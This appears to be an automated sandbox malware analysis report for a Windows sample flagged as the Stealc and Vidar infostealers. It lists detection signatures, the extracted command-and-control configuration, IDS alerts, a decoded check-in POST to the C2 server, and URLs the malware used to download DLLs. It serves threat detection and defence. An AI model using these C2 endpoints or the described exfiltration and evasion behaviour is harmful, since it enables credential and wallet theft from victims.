Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519600
MD5:	4f821793c9107cc4c9f85967114c424c
SHA1:	5135fe7eeb14db192a16000e6d5b0a30347ea619
SHA256:	0a4ec4fbd55120181c561f1d2fd8f83245241e2d82d9aeb365eb5630ecddab33
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4F821793C9107CC4C9F85967114C424C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1711129405.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1939228904.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 7420	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7420	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7420	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7420	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.f0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T18:27:03.524081+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T18:27:03.517704+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T18:27:03.741554+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T18:27:04.836136+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T18:27:03.748786+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T18:27:03.282355+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T18:27:05.356528+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:11.408010+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:12.656299+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:13.399956+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:14.045792+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:16.696172+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:17.351165+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJKJJDBKEGIECAAECFHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4a 4a 44 42 4b 45 47 49 45 43 41 41 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 44 36 34 32 44 43 37 45 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4a 4a 44 42 4b 45 47 49 45 43 41 41 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4a 4a 44 42 4b 45 47 49 45 43 41 41 45 43 46 48 2d 2d 0d 0a Data Ascii: ------JKJKJJDBKEGIECAAECFHContent-Disposition: form-data; name="hwid"F9D642DC7E231817704571------JKJKJJDBKEGIECAAECFHContent-Disposition: form-data; name="build"save------JKJKJJDBKEGIECAAECFH--

Source: file.exe, 00000000.00000002.1939228904.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1939228904.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1939228904.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1939228904.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1939228904.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll)
Source: file.exe, 00000000.00000002.1939228904.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1939228904.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1939228904.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllE
Source: file.exe, 00000000.00000002.1939228904.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1939228904.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllJ
Source: file.exe, 00000000.00000002.1939228904.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllP
Source: file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllW
Source: file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)
Source: file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php5
Source: file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=r
Source: file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpBs
Source: file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpCO
Source: file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpCoinomi
Source: file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpFirefox
Source: file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpH
Source: file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php_
Source: file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php_U
Source: file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpi
Source: file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpick
Source: file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpin
Source: file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpog
Source: file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
Source: file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php~
Source: file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/z
Source: file.exe, 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phpfox
Source: file.exe, 00000000.00000002.1939228904.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37m
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1966811807.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1966394502.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958385102.000000001D327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: KJKKKJJJ.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1963426147.0000000029261000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, GDBFCGIIIJDBGCBGIDGI.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1963426147.0000000029261000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, GDBFCGIIIJDBGCBGIDGI.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: KJKKKJJJ.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: KJKKKJJJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: KJKKKJJJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1963426147.0000000029261000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, GDBFCGIIIJDBGCBGIDGI.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1963426147.0000000029261000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, GDBFCGIIIJDBGCBGIDGI.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: KJKKKJJJ.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: KJKKKJJJ.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: KJKKKJJJ.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GDBFCGIIIJDBGCBGIDGI.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: IJJJEBFHDBGIECBFCBKJKKJDHJ.0.dr	String found in binary or memory: https://support.mozilla.org
Source: IJJJEBFHDBGIECBFCBKJKKJDHJ.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IJJJEBFHDBGIECBFCBKJKKJDHJ.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1792660617.000000001D230000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1792660617.000000001D230000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: file.exe, 00000000.00000002.1963426147.0000000029261000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, GDBFCGIIIJDBGCBGIDGI.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: KJKKKJJJ.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1963426147.0000000029261000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, GDBFCGIIIJDBGCBGIDGI.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: KJKKKJJJ.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: IJJJEBFHDBGIECBFCBKJKKJDHJ.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: IJJJEBFHDBGIECBFCBKJKKJDHJ.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
